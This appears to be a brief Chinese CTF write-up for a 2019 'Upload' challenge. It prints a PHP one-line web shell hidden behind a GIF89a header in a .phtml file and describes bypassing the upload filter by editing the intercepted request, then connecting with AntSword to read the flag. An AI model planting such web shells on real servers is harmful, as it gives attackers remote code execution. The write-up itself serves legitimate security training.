[[极客大挑战 2019]Upload wp
打开页面是这样的

创建一个test.phtml文件,里面内容为一句话
GIF89a
<script language="php">eval($_POST['shell']);</script>

我们把这个文件上传上去试一下

结果不行,我们抓个包看看

修改一下上面标记的地方,放包

猜测路径为
url/upload/test.phtml
用蚁剑链接,shell就是一句话里面的shell

在根目录下找到flag文件,打开

获得flag,考察文件上传漏洞
博客记录了利用shell获取文件上传漏洞flag的过程。先尝试上传文件未成功,接着抓包、修改标记处放包,猜测路径后用蚁剑链接shell,最终在根目录下找到并打开flag文件获得flag。
816

被折叠的 条评论
为什么被折叠?



